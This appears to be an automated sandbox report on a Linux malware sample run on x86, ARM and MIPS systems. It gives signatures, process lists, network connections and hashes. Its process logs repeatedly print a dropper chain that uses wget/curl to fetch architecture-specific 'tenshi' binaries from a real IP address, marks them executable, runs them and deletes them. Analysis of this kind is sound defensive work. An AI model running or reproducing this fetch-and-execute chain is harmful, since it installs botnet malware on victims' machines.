Analysis Overview
SHA256
61fbf36df390dc9c79812fd86bf3c4efbc37533bc19b559c6379c615eba0d09b
Threat Level: Shows suspicious behavior
The file 296a3c4f0b173217c609be610594274f.bin was found to be: Shows suspicious behavior.
Malicious Activity Summary
Executes dropped EXE
Checks CPU configuration
Writes file to tmp directory
Reads runtime system information
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-07-08 02:53
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-07-08 02:53
Reported
2024-07-08 03:06
Platform
ubuntu1804-amd64-20240508-en
Max time kernel
2s
Max time network
132s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/tenshimips | /tmp/tenshimips | N/A |
| N/A | /tmp/tenshimipsel | /tmp/tenshimipsel | N/A |
| N/A | /tmp/tenshish4 | /tmp/tenshish4 | N/A |
| N/A | /tmp/tenshix86 | /tmp/tenshix86 | N/A |
| N/A | /tmp/tenshiarm6 | /tmp/tenshiarm6 | N/A |
| N/A | /tmp/tenshii686 | /tmp/tenshii686 | N/A |
| N/A | /tmp/tenshippc | /tmp/tenshippc | N/A |
| N/A | /tmp/tenshii586 | /tmp/tenshii586 | N/A |
| N/A | /tmp/tenshim68k | /tmp/tenshim68k | N/A |
| N/A | /tmp/tenshish | /tmp/tenshish | N/A |
| N/A | /tmp/tenshifuck | /tmp/tenshifuck | N/A |
| N/A | /tmp/tenshiapache2 | /tmp/tenshiapache2 | N/A |
| N/A | /tmp/tenshitelnetd | /tmp/tenshitelnetd | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/tenshish | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tenshimipsel | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tenshish4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tenshitelnetd | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tenshiarm6 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tenshii686 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tenshii586 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tenshim68k | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tenshifuck | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tenshix86 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tenshippc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tenshimips | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tenshiapache2 | /usr/bin/curl | N/A |
Processes
/tmp/296a3c4f0b173217c609be610594274f.bin
[/tmp/296a3c4f0b173217c609be610594274f.bin]
/usr/bin/wget
[wget http://157.230.117.251/tenshimips]
/usr/bin/curl
[curl -O http://157.230.117.251/tenshimips]
/bin/chmod
[chmod +x tenshimips]
/tmp/tenshimips
[./tenshimips]
/bin/rm
[rm -rf tenshimips]
/usr/bin/wget
[wget http://157.230.117.251/tenshimipsel]
/usr/bin/curl
[curl -O http://157.230.117.251/tenshimipsel]
/bin/chmod
[chmod +x tenshimipsel]
/tmp/tenshimipsel
[./tenshimipsel]
/bin/rm
[rm -rf tenshimipsel]
/usr/bin/wget
[wget http://157.230.117.251/tenshish4]
/usr/bin/curl
[curl -O http://157.230.117.251/tenshish4]
/bin/chmod
[chmod +x tenshish4]
/tmp/tenshish4
[./tenshish4]
/bin/rm
[rm -rf tenshish4]
/usr/bin/wget
[wget http://157.230.117.251/tenshix86]
/usr/bin/curl
[curl -O http://157.230.117.251/tenshix86]
/bin/chmod
[chmod +x tenshix86]
/tmp/tenshix86
[./tenshix86]
/bin/rm
[rm -rf tenshix86]
/usr/bin/wget
[wget http://157.230.117.251/tenshiarm6]
/usr/bin/curl
[curl -O http://157.230.117.251/tenshiarm6]
/bin/chmod
[chmod +x tenshiarm6]
/tmp/tenshiarm6
[./tenshiarm6]
/bin/rm
[rm -rf tenshiarm6]
/usr/bin/wget
[wget http://157.230.117.251/tenshii686]
/usr/bin/curl
[curl -O http://157.230.117.251/tenshii686]
/bin/chmod
[chmod +x tenshii686]
/tmp/tenshii686
[./tenshii686]
/bin/rm
[rm -rf tenshii686]
/usr/bin/wget
[wget http://157.230.117.251/tenshippc]
/usr/bin/curl
[curl -O http://157.230.117.251/tenshippc]
/bin/chmod
[chmod +x tenshippc]
/tmp/tenshippc
[./tenshippc]
/bin/rm
[rm -rf tenshippc]
/usr/bin/wget
[wget http://157.230.117.251/tenshii586]
/usr/bin/curl
[curl -O http://157.230.117.251/tenshii586]
/bin/chmod
[chmod +x tenshii586]
/tmp/tenshii586
[./tenshii586]
/bin/rm
[rm -rf tenshii586]
/usr/bin/wget
[wget http://157.230.117.251/tenshim68k]
/usr/bin/curl
[curl -O http://157.230.117.251/tenshim68k]
/bin/chmod
[chmod +x tenshim68k]
/tmp/tenshim68k
[./tenshim68k]
/bin/rm
[rm -rf tenshim68k]
/usr/bin/wget
[wget http://157.230.117.251/tenshish]
/usr/bin/curl
[curl -O http://157.230.117.251/tenshish]
/bin/chmod
[chmod +x tenshish]
/tmp/tenshish
[./tenshish]
/bin/rm
[rm -rf tenshish]
/usr/bin/wget
[wget http://157.230.117.251/tenshifuck]
/usr/bin/curl
[curl -O http://157.230.117.251/tenshifuck]
/bin/chmod
[chmod +x tenshifuck]
/tmp/tenshifuck
[./tenshifuck]
/bin/rm
[rm -rf tenshifuck]
/usr/bin/wget
[wget http://157.230.117.251/tenshiapache2]
/usr/bin/curl
[curl -O http://157.230.117.251/tenshiapache2]
/bin/chmod
[chmod +x tenshiapache2]
/tmp/tenshiapache2
[./tenshiapache2]
/bin/rm
[rm -rf tenshiapache2]
/usr/bin/wget
[wget http://157.230.117.251/tenshitelnetd]
/usr/bin/curl
[curl -O http://157.230.117.251/tenshitelnetd]
/bin/chmod
[chmod +x tenshitelnetd]
/tmp/tenshitelnetd
[./tenshitelnetd]
/bin/rm
[rm -rf tenshitelnetd]
Network
| Country | Destination | Domain | Proto |
| US | 151.101.193.91:443 | tcp | |
| GB | 185.125.188.61:443 | tcp | |
| GB | 185.125.188.61:443 | tcp | |
| US | 1.1.1.1:53 | ocp-ingress.fastly.gnome.org | udp |
| US | 151.101.193.91:443 | tcp | |
| GB | 89.187.167.3:443 | tcp | |
| N/A | 224.0.0.251:5353 | udp | |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
Files
/tmp/tenshimips
| MD5 | 01e9b3351a20632ce2de4a219637711c |
| SHA1 | d46e0281e15a1ef4fec829351c47c0eacaf6ad5c |
| SHA256 | b99af4f05341cc3630e61fd747d5eb37d45dcf39253f67919a6a1e4bde92f3c2 |
| SHA512 | 33eba632764a2d267bede9278c55e26aac5653873a3b73943ce4a77bef6aa6395bd8fa334d5e3d65c4998fea1b049ffc47ac20c7e6898ec98309f1c45a96220f |
Analysis: behavioral2
Detonation Overview
Submitted
2024-07-08 02:53
Reported
2024-07-08 03:07
Platform
debian9-armhf-20240611-en
Max time kernel
11s
Max time network
14s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/tenshimips | /tmp/tenshimips | N/A |
| N/A | /tmp/tenshimipsel | /tmp/tenshimipsel | N/A |
| N/A | /tmp/tenshish4 | /tmp/tenshish4 | N/A |
| N/A | /tmp/tenshix86 | /tmp/tenshix86 | N/A |
| N/A | /tmp/tenshiarm6 | /tmp/tenshiarm6 | N/A |
| N/A | /tmp/tenshii686 | /tmp/tenshii686 | N/A |
| N/A | /tmp/tenshippc | /tmp/tenshippc | N/A |
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/tenshimipsel | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tenshish4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tenshix86 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tenshiarm6 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tenshii686 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tenshippc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tenshimips | /usr/bin/curl | N/A |
Processes
/tmp/296a3c4f0b173217c609be610594274f.bin
[/tmp/296a3c4f0b173217c609be610594274f.bin]
/usr/bin/wget
[wget http://157.230.117.251/tenshimips]
/usr/bin/curl
[curl -O http://157.230.117.251/tenshimips]
/bin/chmod
[chmod +x tenshimips]
/tmp/tenshimips
[./tenshimips]
/bin/rm
[rm -rf tenshimips]
/usr/bin/wget
[wget http://157.230.117.251/tenshimipsel]
/usr/bin/curl
[curl -O http://157.230.117.251/tenshimipsel]
/bin/chmod
[chmod +x tenshimipsel]
/tmp/tenshimipsel
[./tenshimipsel]
/bin/rm
[rm -rf tenshimipsel]
/usr/bin/wget
[wget http://157.230.117.251/tenshish4]
/usr/bin/curl
[curl -O http://157.230.117.251/tenshish4]
/bin/chmod
[chmod +x tenshish4]
/tmp/tenshish4
[./tenshish4]
/bin/rm
[rm -rf tenshish4]
/usr/bin/wget
[wget http://157.230.117.251/tenshix86]
/usr/bin/curl
[curl -O http://157.230.117.251/tenshix86]
/bin/chmod
[chmod +x tenshix86]
/tmp/tenshix86
[./tenshix86]
/bin/rm
[rm -rf tenshix86]
/usr/bin/wget
[wget http://157.230.117.251/tenshiarm6]
/usr/bin/curl
[curl -O http://157.230.117.251/tenshiarm6]
/bin/chmod
[chmod +x tenshiarm6]
/tmp/tenshiarm6
[./tenshiarm6]
/bin/rm
[rm -rf tenshiarm6]
/usr/bin/wget
[wget http://157.230.117.251/tenshii686]
/usr/bin/curl
[curl -O http://157.230.117.251/tenshii686]
/bin/chmod
[chmod +x tenshii686]
/tmp/tenshii686
[./tenshii686]
/bin/rm
[rm -rf tenshii686]
/usr/bin/wget
[wget http://157.230.117.251/tenshippc]
/usr/bin/curl
[curl -O http://157.230.117.251/tenshippc]
/bin/chmod
[chmod +x tenshippc]
/tmp/tenshippc
[./tenshippc]
/bin/rm
[rm -rf tenshippc]
/usr/bin/wget
[wget http://157.230.117.251/tenshii586]
Network
| Country | Destination | Domain | Proto |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
Files
/tmp/tenshimips
| MD5 | 01e9b3351a20632ce2de4a219637711c |
| SHA1 | d46e0281e15a1ef4fec829351c47c0eacaf6ad5c |
| SHA256 | b99af4f05341cc3630e61fd747d5eb37d45dcf39253f67919a6a1e4bde92f3c2 |
| SHA512 | 33eba632764a2d267bede9278c55e26aac5653873a3b73943ce4a77bef6aa6395bd8fa334d5e3d65c4998fea1b049ffc47ac20c7e6898ec98309f1c45a96220f |
Analysis: behavioral3
Detonation Overview
Submitted
2024-07-08 02:53
Reported
2024-07-08 03:07
Platform
debian9-mipsbe-20240611-en
Max time kernel
123s
Max time network
154s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/tenshimips | /tmp/tenshimips | N/A |
| N/A | /tmp/tenshimipsel | /tmp/tenshimipsel | N/A |
| N/A | /tmp/tenshish4 | /tmp/tenshish4 | N/A |
| N/A | /tmp/tenshix86 | /tmp/tenshix86 | N/A |
| N/A | /tmp/tenshiarm6 | /tmp/tenshiarm6 | N/A |
| N/A | /tmp/tenshii686 | /tmp/tenshii686 | N/A |
| N/A | /tmp/tenshippc | /tmp/tenshippc | N/A |
| N/A | /tmp/tenshii586 | /tmp/tenshii586 | N/A |
| N/A | /tmp/tenshim68k | /tmp/tenshim68k | N/A |
| N/A | /tmp/tenshish | /tmp/tenshish | N/A |
| N/A | /tmp/tenshifuck | /tmp/tenshifuck | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/tenshimipsel | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tenshix86 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tenshiarm6 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tenshii686 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tenshii586 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tenshish | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tenshifuck | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tenshimips | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tenshippc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tenshim68k | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tenshish4 | /usr/bin/curl | N/A |
Processes
/tmp/296a3c4f0b173217c609be610594274f.bin
[/tmp/296a3c4f0b173217c609be610594274f.bin]
/usr/bin/wget
[wget http://157.230.117.251/tenshimips]
/usr/bin/curl
[curl -O http://157.230.117.251/tenshimips]
/bin/chmod
[chmod +x tenshimips]
/tmp/tenshimips
[./tenshimips]
/bin/rm
[rm -rf tenshimips]
/usr/bin/wget
[wget http://157.230.117.251/tenshimipsel]
/usr/bin/curl
[curl -O http://157.230.117.251/tenshimipsel]
/bin/chmod
[chmod +x tenshimipsel]
/tmp/tenshimipsel
[./tenshimipsel]
/bin/rm
[rm -rf tenshimipsel]
/usr/bin/wget
[wget http://157.230.117.251/tenshish4]
/usr/bin/curl
[curl -O http://157.230.117.251/tenshish4]
/bin/chmod
[chmod +x tenshish4]
/tmp/tenshish4
[./tenshish4]
/bin/rm
[rm -rf tenshish4]
/usr/bin/wget
[wget http://157.230.117.251/tenshix86]
/usr/bin/curl
[curl -O http://157.230.117.251/tenshix86]
/bin/chmod
[chmod +x tenshix86]
/tmp/tenshix86
[./tenshix86]
/bin/rm
[rm -rf tenshix86]
/usr/bin/wget
[wget http://157.230.117.251/tenshiarm6]
/usr/bin/curl
[curl -O http://157.230.117.251/tenshiarm6]
/bin/chmod
[chmod +x tenshiarm6]
/tmp/tenshiarm6
[./tenshiarm6]
/bin/rm
[rm -rf tenshiarm6]
/usr/bin/wget
[wget http://157.230.117.251/tenshii686]
/usr/bin/curl
[curl -O http://157.230.117.251/tenshii686]
/bin/chmod
[chmod +x tenshii686]
/tmp/tenshii686
[./tenshii686]
/bin/rm
[rm -rf tenshii686]
/usr/bin/wget
[wget http://157.230.117.251/tenshippc]
/usr/bin/curl
[curl -O http://157.230.117.251/tenshippc]
/bin/chmod
[chmod +x tenshippc]
/tmp/tenshippc
[./tenshippc]
/bin/rm
[rm -rf tenshippc]
/usr/bin/wget
[wget http://157.230.117.251/tenshii586]
/usr/bin/curl
[curl -O http://157.230.117.251/tenshii586]
/bin/chmod
[chmod +x tenshii586]
/tmp/tenshii586
[./tenshii586]
/bin/rm
[rm -rf tenshii586]
/usr/bin/wget
[wget http://157.230.117.251/tenshim68k]
/usr/bin/curl
[curl -O http://157.230.117.251/tenshim68k]
/bin/chmod
[chmod +x tenshim68k]
/tmp/tenshim68k
[./tenshim68k]
/bin/rm
[rm -rf tenshim68k]
/usr/bin/wget
[wget http://157.230.117.251/tenshish]
/usr/bin/curl
[curl -O http://157.230.117.251/tenshish]
/bin/chmod
[chmod +x tenshish]
/tmp/tenshish
[./tenshish]
/bin/rm
[rm -rf tenshish]
/usr/bin/wget
[wget http://157.230.117.251/tenshifuck]
/usr/bin/curl
[curl -O http://157.230.117.251/tenshifuck]
/bin/chmod
[chmod +x tenshifuck]
/tmp/tenshifuck
[./tenshifuck]
/bin/rm
[rm -rf tenshifuck]
/usr/bin/wget
[wget http://157.230.117.251/tenshiapache2]
/usr/bin/curl
[curl -O http://157.230.117.251/tenshiapache2]
Network
| Country | Destination | Domain | Proto |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | tcp |
Files
/tmp/tenshimips
| MD5 | 01e9b3351a20632ce2de4a219637711c |
| SHA1 | d46e0281e15a1ef4fec829351c47c0eacaf6ad5c |
| SHA256 | b99af4f05341cc3630e61fd747d5eb37d45dcf39253f67919a6a1e4bde92f3c2 |
| SHA512 | 33eba632764a2d267bede9278c55e26aac5653873a3b73943ce4a77bef6aa6395bd8fa334d5e3d65c4998fea1b049ffc47ac20c7e6898ec98309f1c45a96220f |
Analysis: behavioral4
Detonation Overview
Submitted
2024-07-08 02:53
Reported
2024-07-08 03:08
Platform
debian9-mipsel-20240226-en
Max time kernel
111s
Max time network
117s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/tenshimips | /tmp/tenshimips | N/A |
| N/A | /tmp/tenshimipsel | /tmp/tenshimipsel | N/A |
| N/A | /tmp/tenshish4 | /tmp/tenshish4 | N/A |
| N/A | /tmp/tenshix86 | /tmp/tenshix86 | N/A |
| N/A | /tmp/tenshiarm6 | /tmp/tenshiarm6 | N/A |
| N/A | /tmp/tenshii686 | /tmp/tenshii686 | N/A |
| N/A | /tmp/tenshippc | /tmp/tenshippc | N/A |
| N/A | /tmp/tenshii586 | /tmp/tenshii586 | N/A |
| N/A | /tmp/tenshim68k | /tmp/tenshim68k | N/A |
| N/A | /tmp/tenshish | /tmp/tenshish | N/A |
| N/A | /tmp/tenshifuck | /tmp/tenshifuck | N/A |
| N/A | /tmp/tenshiapache2 | /tmp/tenshiapache2 | N/A |
| N/A | /tmp/tenshitelnetd | /tmp/tenshitelnetd | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/tenshish4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tenshiarm6 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tenshii586 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tenshish | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tenshimips | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tenshim68k | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tenshifuck | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tenshitelnetd | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tenshix86 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tenshii686 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tenshimipsel | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tenshippc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tenshiapache2 | /usr/bin/curl | N/A |
Processes
/tmp/296a3c4f0b173217c609be610594274f.bin
[/tmp/296a3c4f0b173217c609be610594274f.bin]
/usr/bin/wget
[wget http://157.230.117.251/tenshimips]
/usr/bin/curl
[curl -O http://157.230.117.251/tenshimips]
/bin/chmod
[chmod +x tenshimips]
/tmp/tenshimips
[./tenshimips]
/bin/rm
[rm -rf tenshimips]
/usr/bin/wget
[wget http://157.230.117.251/tenshimipsel]
/usr/bin/curl
[curl -O http://157.230.117.251/tenshimipsel]
/bin/chmod
[chmod +x tenshimipsel]
/tmp/tenshimipsel
[./tenshimipsel]
/bin/rm
[rm -rf tenshimipsel]
/usr/bin/wget
[wget http://157.230.117.251/tenshish4]
/usr/bin/curl
[curl -O http://157.230.117.251/tenshish4]
/bin/chmod
[chmod +x tenshish4]
/tmp/tenshish4
[./tenshish4]
/bin/rm
[rm -rf tenshish4]
/usr/bin/wget
[wget http://157.230.117.251/tenshix86]
/usr/bin/curl
[curl -O http://157.230.117.251/tenshix86]
/bin/chmod
[chmod +x tenshix86]
/tmp/tenshix86
[./tenshix86]
/bin/rm
[rm -rf tenshix86]
/usr/bin/wget
[wget http://157.230.117.251/tenshiarm6]
/usr/bin/curl
[curl -O http://157.230.117.251/tenshiarm6]
/bin/chmod
[chmod +x tenshiarm6]
/tmp/tenshiarm6
[./tenshiarm6]
/bin/rm
[rm -rf tenshiarm6]
/usr/bin/wget
[wget http://157.230.117.251/tenshii686]
/usr/bin/curl
[curl -O http://157.230.117.251/tenshii686]
/bin/chmod
[chmod +x tenshii686]
/tmp/tenshii686
[./tenshii686]
/bin/rm
[rm -rf tenshii686]
/usr/bin/wget
[wget http://157.230.117.251/tenshippc]
/usr/bin/curl
[curl -O http://157.230.117.251/tenshippc]
/bin/chmod
[chmod +x tenshippc]
/tmp/tenshippc
[./tenshippc]
/bin/rm
[rm -rf tenshippc]
/usr/bin/wget
[wget http://157.230.117.251/tenshii586]
/usr/bin/curl
[curl -O http://157.230.117.251/tenshii586]
/bin/chmod
[chmod +x tenshii586]
/tmp/tenshii586
[./tenshii586]
/bin/rm
[rm -rf tenshii586]
/usr/bin/wget
[wget http://157.230.117.251/tenshim68k]
/usr/bin/curl
[curl -O http://157.230.117.251/tenshim68k]
/bin/chmod
[chmod +x tenshim68k]
/tmp/tenshim68k
[./tenshim68k]
/bin/rm
[rm -rf tenshim68k]
/usr/bin/wget
[wget http://157.230.117.251/tenshish]
/usr/bin/curl
[curl -O http://157.230.117.251/tenshish]
/bin/chmod
[chmod +x tenshish]
/tmp/tenshish
[./tenshish]
/bin/rm
[rm -rf tenshish]
/usr/bin/wget
[wget http://157.230.117.251/tenshifuck]
/usr/bin/curl
[curl -O http://157.230.117.251/tenshifuck]
/bin/chmod
[chmod +x tenshifuck]
/tmp/tenshifuck
[./tenshifuck]
/bin/rm
[rm -rf tenshifuck]
/usr/bin/wget
[wget http://157.230.117.251/tenshiapache2]
/usr/bin/curl
[curl -O http://157.230.117.251/tenshiapache2]
/bin/chmod
[chmod +x tenshiapache2]
/tmp/tenshiapache2
[./tenshiapache2]
/bin/rm
[rm -rf tenshiapache2]
/usr/bin/wget
[wget http://157.230.117.251/tenshitelnetd]
/usr/bin/curl
[curl -O http://157.230.117.251/tenshitelnetd]
/bin/chmod
[chmod +x tenshitelnetd]
/tmp/tenshitelnetd
[./tenshitelnetd]
/bin/rm
[rm -rf tenshitelnetd]
Network
| Country | Destination | Domain | Proto |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
| DE | 157.230.117.251:80 | 157.230.117.251 | tcp |
